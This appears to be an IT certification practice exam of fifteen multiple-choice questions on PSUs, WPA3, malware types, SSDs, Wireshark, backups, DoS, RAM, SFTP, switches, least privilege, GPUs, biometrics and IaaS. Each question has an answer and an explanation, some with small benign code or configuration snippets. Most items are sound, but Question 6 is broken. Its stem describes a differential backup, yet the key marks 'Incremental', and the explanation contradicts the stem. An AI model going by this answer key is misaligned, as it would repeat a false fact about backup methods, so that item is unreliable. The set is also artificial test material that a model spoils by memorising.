Question 1
Which component is primarily responsible for converting AC power from a wall outlet into DC power usable by computer components?
A) CPU
B) Power Supply Unit
C) Motherboard
D) GPU
Answer: B
Explanation:
The Power Supply Unit (PSU) is one of the most essential components in any computer system because it serves as the bridge between the electrical power from a wall outlet and the sensitive electronic components inside the computer. A computer cannot use the alternating current (AC) provided by household power outlets directly. Instead, it requires stable direct current (DC) delivered at specific voltages. The PSU performs this crucial AC-to-DC conversion, ensuring that every component—such as the motherboard, CPU, GPU, RAM, and storage devices—receives the proper amount of power to function safely and reliably.
Unlike a PSU, the CPU (Option A) is responsible for executing instructions and processing data, but it does not generate or regulate power. Similarly, the motherboard (Option C) acts as the central circuit hub that allows communication between all hardware components; however, it relies entirely on the PSU to supply clean and consistent power. The GPU (Option D) is essential for rendering images, videos, and graphics-intensive applications, but it too depends on the regulated DC power that only the PSU provides.
A high-quality PSU contributes significantly to system stability and longevity. Poor or unstable power can lead to crashes, reduced component lifespan, or even hardware damage. Many modern PSUs include built-in protection features such as overcurrent, overvoltage, undervoltage, short-circuit, and surge protection. These safety measures help shield valuable hardware from electrical issues. Additionally, modular or semi-modular power supplies offer customizable cable configurations that reduce clutter, improve airflow within the case, and simplify cable management.
Choosing a PSU with adequate wattage and good efficiency is equally important. Efficiency ratings, such as those in the 80 Plus certification system, indicate how effectively a PSU converts AC to DC without wasting energy as heat. Higher efficiency means lower electricity usage, quieter fan operation, and less heat generation. For anyone building, upgrading, or troubleshooting a PC, understanding the PSU’s role is fundamental. A reliable and efficient PSU ensures that all components perform at their best while maintaining long-term system health and stability.
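As a quick worked example of what an efficiency rating means in practice, the short Python calculation below assumes a 90% efficiency figure, roughly what an 80 Plus Gold unit achieves at 50% load; the numbers are illustrative, not from any specific PSU:

dc_load_w = 450            # power the components actually draw from the PSU
efficiency = 0.90          # assumed efficiency, about 80 Plus Gold at 50% load
ac_draw_w = dc_load_w / efficiency      # roughly 500 W pulled from the wall outlet
waste_heat_w = ac_draw_w - dc_load_w    # roughly 50 W dissipated inside the PSU as heat
print(f"Wall draw: {ac_draw_w:.0f} W, waste heat: {waste_heat_w:.0f} W")

A less efficient unit delivering the same 450 W would pull more from the wall and shed the difference as heat, which is why higher-rated supplies tend to run cooler and quieter.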
Question 2
Which security protocol encrypts wireless network traffic to protect against eavesdropping and unauthorized access?
A) WEP
B) WPA3
C) HTTP
D) FTP
Answer: B
Explanation:
WPA3 is the newest and most advanced Wi-Fi security protocol developed to protect wireless communications by encrypting data transmitted between devices and access points. As modern networks face increasingly sophisticated cyber threats, WPA3 provides stronger defenses to ensure that users’ information remains private and that unauthorized individuals cannot easily access or intercept network traffic. It is designed as the successor to earlier protocols, including WEP and WPA2, both of which have known vulnerabilities that attackers can exploit.
WEP (Option A) was one of the first wireless encryption standards, but it is now considered obsolete due to weak encryption and easily exploitable flaws. Attackers can break WEP security within minutes using widely available tools, which is why it is no longer recommended for any modern network. HTTP (Option C) is not a Wi-Fi security protocol at all; it is a web communication protocol that transmits data unencrypted, making it unsuitable for protecting sensitive information. Similarly, FTP (Option D) is a file transfer protocol that lacks built-in encryption, exposing data to interception unless a secure alternative such as FTPS or SFTP is used instead.
WPA3 improves security by introducing more robust encryption methods, including Simultaneous Authentication of Equals (SAE), which replaces WPA2’s less secure pre-shared key system. SAE significantly reduces vulnerability to offline dictionary and brute-force attacks, making password guessing far more difficult for attackers. WPA3-Personal uses individualized data encryption for users on the same network, while WPA3-Enterprise offers a 192-bit security suite designed for organizations that require a high level of protection.
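For illustration only, a minimal hostapd-style access point configuration enabling WPA3-Personal might look like the following; the SSID and passphrase are placeholders, and exact options vary with the hostapd version and hardware support:

ssid=ExampleNetwork
wpa=2
wpa_key_mgmt=SAE            # use Simultaneous Authentication of Equals instead of WPA2's PSK
sae_password=CorrectHorseBatteryStaple
rsn_pairwise=CCMP
ieee80211w=2                # require Protected Management Frames, mandatory for WPA3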
Network administrators adopt WPA3 to secure wireless access points, ensure data confidentiality, and defend against common wireless attacks such as eavesdropping or unauthorized access attempts. When combined with strong passwords, multi-factor authentication, and proper network segmentation, WPA3 forms a critical part of a modern cybersecurity strategy. Understanding how WPA3 works—and configuring it correctly—is essential for IT professionals, businesses, and everyday users who want safe, encrypted wireless communication in today’s increasingly connected digital environment.
Question 3
What type of malware restricts access to a system or files and demands a ransom to restore functionality?
A) Spyware
B) Ransomware
C) Trojan
D) Worm
Answer: B
Explanation:
Ransomware is a highly destructive form of malicious software designed to encrypt files, block system access, or both, ultimately preventing users from reaching their data until a ransom is paid. Once a system becomes infected, the ransomware typically displays a message demanding payment—often in cryptocurrency—to provide a decryption key or unlock the affected device. This type of attack has become one of the most disruptive threats in modern cybersecurity, targeting individuals, businesses, hospitals, schools, and even government agencies. The delivery methods are diverse and commonly involve phishing emails containing harmful attachments, misleading links to malicious websites, drive-by downloads, or the exploitation of unpatched software vulnerabilities.
Unlike ransomware, spyware (Option A) silently monitors user behavior and collects data such as passwords, browsing history, or keystrokes, but it does not encrypt files or demand payment. A Trojan (Option C) disguises itself as legitimate software to trick users into installing it, but its goals vary and do not necessarily involve holding data hostage. Worms (Option D) replicate themselves across networks without the need for user interaction, spreading quickly but typically focusing on propagation rather than extortion. Ransomware distinguishes itself from these forms of malware by combining data disruption with financial coercion.
The consequences of a ransomware attack can be severe. Victims may suffer extensive data loss, business interruptions, costly recovery efforts, and long-term reputational damage. For organizations, downtime can halt operations entirely, leading to significant financial losses and potential legal implications—especially if sensitive information is compromised.
Preventing ransomware requires a multi-layered defense strategy. Key measures include maintaining regular, offline backups; using updated antivirus and endpoint protection tools; applying security patches promptly; and training users to recognize phishing attempts and suspicious downloads. When an attack occurs, an effective incident response plan involves isolating infected systems, preserving evidence, contacting security professionals, and reporting the incident to relevant authorities. Cybersecurity experts generally advise against paying the ransom, as it encourages further criminal activity and does not guarantee successful data recovery.
Question 4
Which storage device type uses flash memory for fast access and no moving parts, often replacing traditional hard drives?
A) HDD
B) SSD
C) Optical Drive
D) Tape Drive
Answer: B
Explanation:
Solid State Drives (SSDs) are modern storage devices that use flash memory to store and access data electronically, offering substantial performance advantages over traditional Hard Disk Drives (HDDs). Unlike HDDs, which depend on spinning magnetic platters and mechanical read/write heads, SSDs have no moving parts. This design not only makes SSDs significantly faster in terms of read/write operations but also enhances their durability, shock resistance, and overall reliability. As a result, SSDs have become the preferred storage solution in many contemporary computing environments.
Option A, the HDD, remains useful for high-capacity and cost-efficient storage but suffers from slower performance due to its mechanical components. These moving parts make HDDs more prone to wear and physical damage, especially in mobile devices. Option C, Optical Drives, which read and write data on CDs, DVDs, or Blu-ray discs, are far slower and largely obsolete for everyday computing. Option D, Tape Drives, are designed mainly for long-term archival storage and backup purposes, offering high capacity but extremely slow data retrieval compared to SSDs.
SSDs dramatically improve system responsiveness, reducing boot times, accelerating application loading, and enabling smoother multitasking. These benefits are particularly important in laptops, gaming systems, and data-intensive workstations, where performance and energy efficiency are essential. Since SSDs consume less power, they contribute to longer battery life in portable devices and reduced heat generation in desktops and servers.
Modern SSDs come in several form factors and interfaces. SATA SSDs are widely compatible but limited by the older interface's bandwidth. NVMe SSDs, often in the M.2 form factor, use the high-speed PCIe interface to deliver far greater throughput and lower latency, making them ideal for demanding applications such as video editing, virtual machines, and high-performance gaming.
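As a rough way to see these differences on a given machine, a short Python sketch can time a sequential read of a large existing file; the file name below is a placeholder, and operating system caching and background activity skew the result, so dedicated benchmark tools are preferred for real measurements:

import time

def rough_read_mbps(path, chunk_size=1024 * 1024):
    # Read the file sequentially in 1 MiB chunks and report an approximate MB/s figure.
    total = 0
    start = time.perf_counter()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            total += len(chunk)
    elapsed = time.perf_counter() - start
    return (total / (1024 * 1024)) / elapsed

print(f"{rough_read_mbps('large_test_file.bin'):.0f} MB/s")   # placeholder file name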
Although SSDs typically cost more per gigabyte than HDDs, their advantages often justify the investment. When selecting an SSD, factors such as storage capacity, interface type, endurance ratings (TBW), and overall cost should be considered to balance performance and budget needs. The widespread adoption of SSD technology has revolutionized computing by enabling faster data access, improving productivity, and creating a smoother, more responsive user experience across personal, business, and enterprise environments.
Question 5
Which tool is used to monitor and diagnose network connectivity, packet flow, and performance issues?
A) Ping
B) Traceroute
C) Wireshark
D) Netstat
Answer: C
Explanation:
Wireshark is a powerful and widely used network protocol analyzer that enables IT professionals to capture, inspect, and interpret packets traveling across a network. By providing visibility into the raw data exchanged between devices, Wireshark allows administrators and analysts to diagnose complex connectivity problems, investigate suspicious activity, and optimize network performance. It is capable of capturing traffic from both wired and wireless interfaces, giving users a detailed, real-time look at how devices communicate using various network protocols.
Unlike basic troubleshooting tools such as Ping (Option A), which merely tests connectivity and measures response times, Wireshark offers deep packet-level insight. While Ping can confirm whether a device is reachable, it cannot show what type of data is being exchanged or whether errors exist within the communication stream. Traceroute (Option B) helps identify the path a packet takes through a network, but it does not allow users to inspect protocol details or packet content. Netstat (Option D) provides information about active network connections and listening ports, yet it still lacks the granular inspection capabilities essential for detailed analysis. Wireshark, in contrast, decodes hundreds of protocols, displays header information, and reveals payload data, making it invaluable for comprehensive troubleshooting.
The tool includes advanced features such as customizable filters, flow analysis, protocol dissection, and statistical reporting. These capabilities help users identify latency problems, misconfigured devices, excessive bandwidth consumption, and unauthorized or malicious traffic. Security analysts frequently use Wireshark during incident investigations to detect anomalies, trace potential intrusions, and analyze attack patterns. Network administrators rely on it to monitor performance, verify configurations, and ensure that applications and services communicate properly.
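Wireshark itself is driven interactively, but the same kind of capture can be sketched programmatically with the third-party scapy library in Python, which helps show what a capture filter does. The filter below uses the BPF syntax shared by tcpdump and Wireshark capture filters; Wireshark's display filters, such as ip.addr == 192.168.1.10 && tcp.port == 443, use a different syntax:

from scapy.all import sniff   # third-party: pip install scapy; capturing usually needs admin rights

def show(pkt):
    print(pkt.summary())      # one-line summary of each captured packet

# Capture ten packets to or from TCP port 443 on the default interface
sniff(filter="tcp port 443", prn=show, count=10)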
Beyond its practical applications, Wireshark also serves as an educational resource. Students and professionals alike use it to learn about TCP/IP fundamentals, packet structures, and real-world client-server interactions. Because it exposes the inner workings of network communication, Wireshark is indispensable not only for troubleshooting and cybersecurity investigations but also for building foundational networking knowledge. Its versatility, depth of analysis, and ease of use make it one of the most essential tools for anyone working in the field of networking or information security.
Question 6
Which type of backup captures only the changes made since the last full backup, reducing storage and backup time?
A) Full Backup
B) Incremental Backup
C) Differential Backup
D) Mirror Backup
Answer: B
Explanation:
An incremental backup is a highly efficient backup method that captures only the data that has changed since the last backup—whether that previous backup was full or incremental. This approach significantly reduces the amount of storage space required and shortens the time needed to complete each backup cycle. Because organizations generate large volumes of data daily, incremental backups allow frequent protection of critical information without the heavy overhead associated with duplicating unchanged files.
In contrast, a Full Backup (Option A) copies all selected data every time it runs. While this method provides a complete and self-contained snapshot of the system, it demands far more time and storage resources, making it impractical for frequent backups in large environments. Differential Backup (Option C) captures all changes made since the last full backup. Although faster than a full backup, a differential backup grows with each subsequent backup cycle, gradually requiring more storage and longer backup windows. A Mirror Backup (Option D) creates a real-time or near-real-time duplicate of the source data, ensuring an immediate replica but offering no historical versions or rollback options, which limits its usefulness for long-term recovery strategies.
Incremental backups are widely adopted in business and enterprise settings due to their optimal balance of speed, efficiency, and protection. However, restoring data from incremental backups requires careful handling of the dependency chain. To fully recover a system, administrators must have the most recent full backup along with every incremental backup created afterward. This sequence allows the system to rebuild data accurately and consistently.
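A minimal sketch of the selection logic, written in Python and assuming that changes are detected by file modification time (real backup products use archive bits, file system journals, or snapshots instead), could look like this:

import os, shutil

def incremental_copy(src_root, dst_root, last_backup_ts):
    # Copy only files modified after the previous backup's timestamp.
    for dirpath, _dirs, files in os.walk(src_root):
        for name in files:
            src = os.path.join(dirpath, name)
            if os.path.getmtime(src) > last_backup_ts:
                rel = os.path.relpath(src, src_root)
                dst = os.path.join(dst_root, rel)
                os.makedirs(os.path.dirname(dst), exist_ok=True)
                shutil.copy2(src, dst)   # copy2 preserves timestamps and metadata

# After a successful run the current time is recorded as the new reference point;
# a full restore then needs the last full backup plus every increment made since.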
Modern backup solutions enhance incremental backup processes with features such as automated scheduling, compression to minimize storage usage, and encryption to protect sensitive data during transfer and storage. For IT administrators, understanding the strengths, limitations, and operational requirements of incremental backups is essential for maintaining business continuity, minimizing downtime, and meeting legal or regulatory compliance standards. With proper planning and execution, incremental backup strategies ensure reliable data protection while maximizing performance and resource efficiency across the organization.
Question 7
Which type of attack sends a flood of requests to a server to overwhelm resources and disrupt services?
A) Phishing
B) Denial of Service
C) Rootkit
D) Keylogger
Answer: B
Explanation:
A Denial of Service (DoS) attack is a deliberate attempt to overwhelm a server, network, or application by flooding it with excessive traffic or resource-intensive requests. When a target system becomes overloaded, it can no longer respond to legitimate users, resulting in service degradation or complete unavailability. DoS attacks exploit the finite processing power, memory, and bandwidth of a system, making them a significant threat to businesses, online services, and critical infrastructure. These attacks can disrupt normal operations, cause substantial financial losses, and damage an organization’s reputation due to prolonged downtime.
Unlike DoS attacks, Phishing (Option A) focuses on deceiving users into revealing sensitive information such as passwords or financial data, rather than interrupting service availability. A Rootkit (Option C) is a type of malicious software designed to hide unauthorized activity and maintain covert access to a system, but it does not inherently overload servers or networks. A Keylogger (Option D) is used to secretly record keystrokes for information theft, again focusing on data compromise rather than resource exhaustion. DoS attacks stand out because their primary objective is to disrupt service rather than steal information.
DoS attacks can originate from one system, but they often become more damaging and difficult to mitigate when executed as Distributed Denial of Service (DDoS) attacks. In a DDoS attack, multiple compromised devices—typically part of a botnet—simultaneously generate massive amounts of traffic, overwhelming even robust network infrastructures. This distributed nature makes DDoS attacks harder to detect and defend against because the malicious traffic appears to come from numerous legitimate sources.
Mitigation strategies include traffic filtering, rate limiting, load balancing, and the use of Content Delivery Networks (CDNs) to distribute traffic across multiple servers. Organizations also deploy intrusion detection and prevention systems (IDS/IPS) to identify unusual traffic patterns early. Redundancy, failover systems, and well-planned incident response procedures further strengthen resilience against these attacks.
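Rate limiting is one of the simpler mitigations to reason about. A minimal token-bucket limiter, sketched in Python with illustrative numbers, admits a steady request rate plus short bursts and rejects the excess:

import time

class TokenBucket:
    def __init__(self, rate, capacity):
        self.rate = rate             # tokens (requests) replenished per second
        self.capacity = capacity     # maximum burst size
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False                 # over the limit: drop or defer the request

bucket = TokenBucket(rate=100, capacity=200)
# A web front end might return HTTP 429 whenever bucket.allow() is False.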
Understanding how DoS and DDoS attacks function is essential for IT administrators, security teams, and organizational leaders. With proper planning, monitoring, and technical safeguards, organizations can greatly reduce their vulnerability to these disruptive attacks and maintain continuous service availability, even in the face of malicious attempts to overwhelm their resources.
Question 8
Which component of a computer is responsible for temporary storage of data and instructions currently in use by the CPU?
A) ROM
B) RAM
C) SSD
D) GPU
Answer: B
Explanation:
Random Access Memory (RAM) is a vital component of any computer system because it serves as the CPU’s high-speed workspace, temporarily storing the data, applications, and instructions currently in use. RAM is considered volatile memory, meaning its contents are lost when the system powers off. However, its extremely fast read and write speeds allow the CPU to access information almost instantly, which dramatically enhances overall system responsiveness and performance. Without sufficient RAM, even powerful processors cannot perform efficiently because they must constantly wait for data to load from slower storage devices.
Option A, Read-Only Memory (ROM), differs significantly from RAM because it is non-volatile and is used to store firmware or permanent instructions essential for system startup, not for active data processing. Option C, a Solid State Drive (SSD), provides long-term storage and is much faster than traditional hard drives, but it is still far slower than RAM and is not designed for temporary data manipulation. Option D, the Graphics Processing Unit (GPU), specializes in rendering graphics and performing parallel computations, not serving as general-purpose memory for running applications.
RAM plays a crucial role in multitasking and modern computing workloads. Higher RAM capacity enables multiple applications, browser tabs, and background processes to operate simultaneously without causing performance degradation. This is especially important in memory-intensive activities such as gaming, video editing, 3D modeling, virtualization, and large-scale data analytics. When a system lacks adequate RAM, it resorts to using virtual memory on the storage drive, which is significantly slower and often results in lag, freezing, or reduced overall efficiency.
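A quick way to observe this relationship on a live system is the third-party psutil package in Python; sustained swap usage alongside high RAM utilization is a classic sign that a machine is short on memory:

import psutil   # third-party: pip install psutil

vm = psutil.virtual_memory()
swap = psutil.swap_memory()
print(f"Total RAM : {vm.total / 2**30:.1f} GiB")
print(f"Available : {vm.available / 2**30:.1f} GiB ({vm.percent}% in use)")
print(f"Swap used : {swap.used / 2**30:.1f} GiB")   # heavy swap use suggests adding RAM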
Different generations of RAM—such as DDR3, DDR4, and DDR5—offer improvements in speed, bandwidth, latency, and power efficiency. System administrators and IT professionals must ensure compatibility among RAM modules, motherboards, and CPUs, while also considering future upgrade options to extend a system’s lifespan. Understanding how RAM functions and how it interacts with the rest of the system is essential for diagnosing performance bottlenecks, planning hardware upgrades, and optimizing computing environments in both personal and enterprise settings. Proper RAM management directly contributes to smoother operation, improved productivity, and a better user experience.
Question 9
Which protocol is used to securely transfer files over a network while encrypting both commands and data?
A) FTP
B) SFTP
C) HTTP
D) Telnet
Answer: B
Explanation:
SFTP (Secure File Transfer Protocol) is a secure method for transferring files across a network, offering strong encryption and authentication to protect sensitive data during transmission. Unlike traditional file transfer methods, SFTP ensures that both commands and data packets are encrypted, preventing attackers from intercepting, modifying, or eavesdropping on the information being exchanged. This makes SFTP a preferred choice for organizations that handle confidential documents, financial data, or regulated information requiring strict security controls.
Option A, FTP, is the standard File Transfer Protocol but lacks encryption, meaning data—including usernames and passwords—is sent in plaintext. This exposes sensitive information to potential interception, making FTP unsuitable for secure data transmission. Option C, HTTP, is primarily used for loading web pages and does not provide secure file transfer capabilities unless paired with TLS (forming HTTPS). Option D, Telnet, allows remote command-line access but also transmits data unencrypted, posing significant security risks. In contrast, SFTP operates on top of SSH (Secure Shell), leveraging its encryption mechanisms and authentication features to establish a secure communication channel.
SFTP is widely used by network administrators and IT professionals for tasks such as secure backups, transferring confidential files, and synchronizing data between servers or remote systems. Its support for password-based authentication, SSH keys, access control lists, and detailed logging provides multiple layers of security. These features help organizations comply with regulatory frameworks such as HIPAA, PCI-DSS, and GDPR, which require strong protections for data in transit.
In addition to security benefits, SFTP is highly functional, supporting automated workflows through scripting, batch transfers, and integration with enterprise backup and management systems. IT teams can schedule regular file transfers, monitor activity logs, and enforce permissions to maintain consistent operational security.
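As a small illustration of such scripting, the third-party paramiko library in Python can upload a file over SFTP; the host name, account, and paths below are placeholders:

import paramiko   # third-party: pip install paramiko

client = paramiko.SSHClient()
client.load_system_host_keys()                  # trust hosts already in known_hosts
client.connect("backup.example.com", username="svc_backup",
               key_filename="/home/svc/.ssh/id_ed25519")   # SSH key authentication

sftp = client.open_sftp()
sftp.put("reports/q3.pdf", "/srv/incoming/q3.pdf")   # both commands and data travel encrypted
sftp.close()
client.close()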
Question 10
Which device connects multiple network segments and forwards traffic based on MAC addresses?
A) Router
B) Switch
C) Hub
D) Firewall
Answer: B
Explanation:
A network switch is a fundamental device used within a local area network (LAN) to connect multiple computers, servers, printers, and other networked devices. Unlike basic network hardware, a switch intelligently forwards data by examining the Media Access Control (MAC) addresses embedded in Ethernet frames. This allows the switch to send data directly to its intended destination rather than broadcasting it to every connected device. By reducing unnecessary traffic and collisions, switches significantly improve network efficiency, performance, and overall reliability.
Option A, the Router, serves a different role by routing traffic between separate networks—typically between a LAN and the internet—using IP addresses rather than MAC addresses. Option C, the Hub, is an older and less efficient device that broadcasts all incoming data to every port, leading to collisions, congestion, and poor bandwidth utilization. Option D, the Firewall, operates primarily as a security appliance that controls inbound and outbound traffic according to security policies, but it does not perform switching or MAC-based forwarding.
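The forwarding decision can be modeled conceptually in a few lines of Python: the switch learns which port each source MAC arrived on, forwards frames for known destinations out of a single port, and falls back to flooding (hub-like behavior) only when the destination is still unknown. This is a simplification of what real switch hardware does:

mac_table = {}   # MAC address -> port it was last seen on

def handle_frame(src_mac, dst_mac, in_port, all_ports):
    mac_table[src_mac] = in_port                   # learn the sender's location
    out_port = mac_table.get(dst_mac)
    if out_port is not None and out_port != in_port:
        return [out_port]                          # unicast to the known port only
    return [p for p in all_ports if p != in_port]  # unknown destination: flood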
Modern switches support important features such as full-duplex communication, which allows devices to send and receive data simultaneously, greatly increasing throughput. They also enable Virtual Local Area Networks (VLANs), which segment network traffic into logical groups, improving both security and traffic management. Managed switches, commonly used in enterprise and campus environments, offer advanced capabilities such as Quality of Service (QoS) for prioritizing critical applications, port mirroring for monitoring traffic, link aggregation for combining bandwidth across multiple ports, and security controls like MAC filtering or 802.1X authentication.
Understanding how switches operate is essential for network administrators tasked with designing scalable, efficient, and secure network infrastructures. Proper switch deployment can optimize bandwidth usage, minimize latency, and ensure smooth communication between devices, even in high-traffic environments. Whether implemented in corporate networks, data centers, schools, or smart homes, switches serve as foundational building blocks that support reliable connectivity and enable advanced network functionality. Their combination of performance, intelligence, and flexibility makes them indispensable components of today’s interconnected world.
Question 11
Which security principle ensures that users can only access resources necessary for their role?
A) Least Privilege
B) Defense in Depth
C) Separation of Duties
D) Network Segmentation
Answer: A
Explanation:
The principle of least privilege is a fundamental concept in cybersecurity that limits users’ access rights to only the resources, applications, and permissions necessary to perform their specific job responsibilities. By restricting access in this manner, organizations minimize the potential for accidental or intentional misuse of sensitive data and reduce the attack surface available to both internal and external threats. Implementing least privilege helps prevent unauthorized access, mitigates insider threats, and contains the potential damage caused by compromised accounts or credentials.
Option B, Defense in Depth, differs from least privilege as it focuses on deploying multiple layers of security controls, such as firewalls, intrusion detection systems, and antivirus solutions, to protect information assets. Option C, Separation of Duties, reduces risk by dividing responsibilities among multiple individuals to prevent fraud or abuse of power. Option D, Network Segmentation, isolates network segments to limit traffic between systems and reduce exposure, but it does not inherently restrict user permissions.
Enforcing least privilege often involves structured access control mechanisms. Role-Based Access Control (RBAC) assigns permissions based on job roles, simplifying management and ensuring consistency. Mandatory Access Control (MAC) uses strict system-enforced policies to regulate access, often applied in highly secure environments. Discretionary Access Control (DAC) allows resource owners to determine permissions, providing flexibility but requiring careful oversight. Each approach offers a balance between granularity, administrative effort, and security.
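A minimal RBAC-style check, sketched in Python with made-up roles and actions, shows the idea: a request is permitted only if the user's role explicitly includes that action, and everything else is denied by default:

ROLE_PERMISSIONS = {
    "helpdesk": {"reset_password", "view_tickets"},
    "dba":      {"query_database", "run_backups"},
    "auditor":  {"view_logs"},
}

def is_allowed(role, action):
    # Deny by default; grant only what the role explicitly lists.
    return action in ROLE_PERMISSIONS.get(role, set())

print(is_allowed("helpdesk", "reset_password"))   # True
print(is_allowed("helpdesk", "run_backups"))      # False: outside the role's duties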
To maintain adherence to the principle of least privilege, organizations must implement continuous monitoring, regular auditing, and periodic reviews of user permissions. As employees change roles or leave the organization, access rights should be promptly updated or revoked to prevent privilege creep. Least privilege is also a cornerstone of regulatory compliance frameworks such as PCI DSS, HIPAA, and NIST guidelines, which emphasize strict control over sensitive data and system access.
By systematically applying least privilege, organizations reduce the risk of data breaches, limit lateral movement within networks, and enhance overall cybersecurity posture. It provides a practical and proactive approach to protecting critical systems and information while ensuring users can perform their duties without unnecessary access.
Question 12
Which type of expansion card is primarily used to enhance a computer’s video rendering capabilities?
A) NIC
B) GPU
C) Sound Card
D) HBA
Answer: B
Explanation:
A Graphics Processing Unit (GPU) expansion card is a specialized hardware component designed to accelerate the processing of graphics and visual computations. Unlike a central processing unit (CPU), which handles general-purpose computing tasks, a GPU contains thousands of smaller, highly efficient cores optimized for parallel processing. This architecture allows GPUs to handle multiple operations simultaneously, making them ideal for rendering high-resolution 3D graphics, processing video and animations, performing scientific simulations, and executing artificial intelligence or machine learning algorithms.
Option A, a Network Interface Card (NIC), serves a completely different function by managing network communication and data transfer between devices. Option C, a Sound Card, is responsible for processing audio signals and providing enhanced audio output, rather than handling graphics. Option D, a Host Bus Adapter (HBA), connects storage devices such as hard drives or SSDs to the system and does not contribute to visual or computational processing.
Modern GPUs support advanced features such as multiple display outputs, ultra-high-definition textures, real-time ray tracing, and hardware-accelerated graphics APIs including DirectX, OpenGL, and Vulkan. They also come with dedicated video memory (VRAM), which stores textures, frame buffers, and other graphical data to reduce latency and improve rendering performance. Cooling solutions, power requirements, and interface compatibility—such as PCI Express slots—are critical considerations when selecting a GPU for a system.
The choice of GPU depends heavily on the intended workload. Gamers benefit from high-frame-rate GPUs for smooth gameplay, content creators rely on GPUs to accelerate video editing and 3D rendering, and researchers or AI practitioners use GPUs for large-scale parallel computations. Understanding GPU architecture, memory capacity, thermal design, and driver support is essential for IT professionals, system builders, and enthusiasts seeking optimal performance.
High-performance GPUs enhance user experience by significantly reducing rendering times, enabling realistic graphics, supporting multi-monitor setups, and facilitating advanced applications that would otherwise overwhelm a standard CPU. They are indispensable in modern computing environments where visual fidelity, computational speed, and efficient parallel processing are critical for productivity, entertainment, and research.
Question 13
Which type of authentication uses physical or behavioral traits to verify a user’s identity?
A) Password
B) Biometric
C) Token
D) PIN
Answer: B
Explanation:
Biometric authentication is a security mechanism that verifies a user’s identity by analyzing unique physical or behavioral characteristics. Common biometric identifiers include fingerprints, iris or retinal patterns, facial features, and voice recognition. Unlike traditional authentication methods that rely on knowledge or possession, such as passwords, PINs, or security tokens, biometric authentication leverages traits that are inherently tied to the individual, making unauthorized access significantly more difficult.
Option A, a password, is knowledge-based and can be guessed, stolen, or compromised. Option C, a token, is a physical or digital device that generates one-time passwords (OTPs) and requires possession by the user. Option D, a PIN, is a simple numeric password, also knowledge-based, and vulnerable to observation or brute-force attacks. In contrast, biometrics provides a higher level of assurance because the authentication factor is intrinsic to the individual and cannot easily be transferred or replicated.
The effectiveness of biometric systems depends on several factors, including sensor accuracy, the quality of the biometric sample, and the algorithms used to match templates. System performance is often measured by false acceptance rates (FAR) and false rejection rates (FRR), which indicate how often unauthorized users are incorrectly accepted or authorized users are incorrectly denied. Secure storage of biometric templates is also critical, as these digital representations of physical traits must be encrypted and protected to prevent theft, spoofing, or replay attacks. Privacy considerations are paramount, particularly in regulated industries where biometric data is considered sensitive personal information.
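Both rates are simple ratios, shown below with made-up numbers; tightening the match threshold typically lowers FAR while raising FRR, so tuning is a trade-off:

impostor_attempts = 10_000
false_accepts     = 3        # impostors wrongly accepted
genuine_attempts  = 10_000
false_rejects     = 120      # legitimate users wrongly rejected

far = false_accepts / impostor_attempts   # 0.0003 -> 0.03% false acceptance rate
frr = false_rejects / genuine_attempts    # 0.0120 -> 1.20% false rejection rate
print(f"FAR = {far:.2%}, FRR = {frr:.2%}")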
Biometric authentication has become widely integrated into modern technology, from smartphones and laptops to building access systems and high-security facilities. While highly effective, biometrics is often combined with other authentication methods in multi-factor authentication (MFA) frameworks, providing layered security and mitigating the risk of circumvention. Proper enrollment procedures, ongoing monitoring, and template protection are essential for maintaining the integrity and reliability of biometric systems.
Question 14
Which malware type is designed to replicate itself and spread across networks without user interaction?
A) Worm
B) Trojan
C) Ransomware
D) Adware
Answer: A
Explanation:
A worm is a type of malicious software designed to self-replicate and spread autonomously across networks without requiring user intervention. Unlike other forms of malware, worms do not need to be executed by the user or disguised as legitimate software; instead, they exploit vulnerabilities in operating systems, applications, or network protocols to propagate from one device to another. This ability to spread rapidly makes worms particularly dangerous, as they can infect a large number of systems in a short period, often causing significant network congestion and service disruptions.
Option B, a Trojan, differs from a worm because it relies on tricking the user into installing it, typically by masquerading as legitimate software or files. Option C, ransomware, focuses on encrypting a user’s files or system and demanding a ransom payment for their release, rather than self-propagating. Option D, adware, primarily serves advertisements to the user and does not replicate or spread independently. In contrast, worms are autonomous and can move through networks using vulnerabilities, email attachments, malicious scripts, or unsecured network services, often acting as a delivery mechanism for additional malware such as spyware, ransomware, or backdoors.
The impact of worm infections can be severe, ranging from reduced network performance due to excessive bandwidth consumption to widespread operational downtime. Some worms also create security backdoors, allowing attackers to gain persistent access to compromised systems. To mitigate these threats, organizations implement measures such as network segmentation, regular patch management, firewalls, antivirus solutions, and intrusion detection and prevention systems. Monitoring network traffic for unusual patterns and educating users about potential threats are also critical components of a comprehensive defense strategy.
Understanding worm behavior, attack vectors, and propagation mechanisms is essential for IT security professionals to design resilient networks and respond effectively to outbreaks. By proactively securing systems and applying robust security policies, organizations can prevent large-scale infections, protect sensitive data, and maintain operational continuity even in the face of increasingly sophisticated malware threats.
Question 15
Which cloud service model provides hardware, storage, and networking infrastructure while allowing users to install and manage operating systems and applications?
A) SaaS
B) PaaS
C) IaaS
D) DaaS
Answer: C
Explanation:
Infrastructure as a Service (IaaS) is a cloud computing model that provides virtualized computing resources over the internet, allowing organizations to access and manage servers, storage, networking, and other fundamental infrastructure components without the need to maintain physical hardware on-premises. With IaaS, users can deploy and control operating systems, middleware, and applications according to their specific requirements, offering flexibility and scalability that traditional infrastructure cannot easily match. This model is particularly beneficial for businesses with fluctuating workloads, as resources can be scaled up or down on demand, reducing costs associated with overprovisioning and underutilized hardware.
Option A, Software as a Service (SaaS), differs from IaaS in that it delivers fully managed software applications to end-users, removing the need for users to manage infrastructure, platforms, or runtime environments. Option B, Platform as a Service (PaaS), provides a development and deployment environment, including runtime, middleware, and tools for building applications, but abstracts the underlying infrastructure from the user. Option D, Desktop as a Service (DaaS), delivers virtual desktop environments, enabling users to access desktop operating systems remotely without managing underlying servers or storage. In contrast, IaaS gives users the most control over infrastructure resources, making it ideal for system administrators, DevOps teams, and IT professionals who require direct management capabilities.
Key advantages of IaaS include rapid provisioning of infrastructure, high availability, and cost efficiency, as organizations only pay for the resources they consume. However, users are responsible for configuring and securing their virtual machines, networks, and storage, as well as implementing monitoring, backup, and patch management. Understanding IaaS involves familiarity with virtualization technologies, cloud resource provisioning, networking, security configurations, and compliance requirements.
